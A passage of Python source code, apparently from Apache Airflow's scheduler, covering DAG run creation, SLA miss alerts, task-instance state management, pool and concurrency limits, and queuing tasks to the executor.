raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
if run_duration is None:
self.run_duration = conf.getint('scheduler',
'run_duration')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag.normalized_schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, basestring):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if conf.getboolean('core', 'CHECK_SLAS', fallback=True):
self.manage_slas(dag)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in \
(executors.LocalExecutor, executors.SequentialExecutor):
pickle_dags = True
self.log.info("Running execute loop for %s seconds", self.run_duration)
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessor(file_path,
pickle_dags,
self.dag_ids,
zombies)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
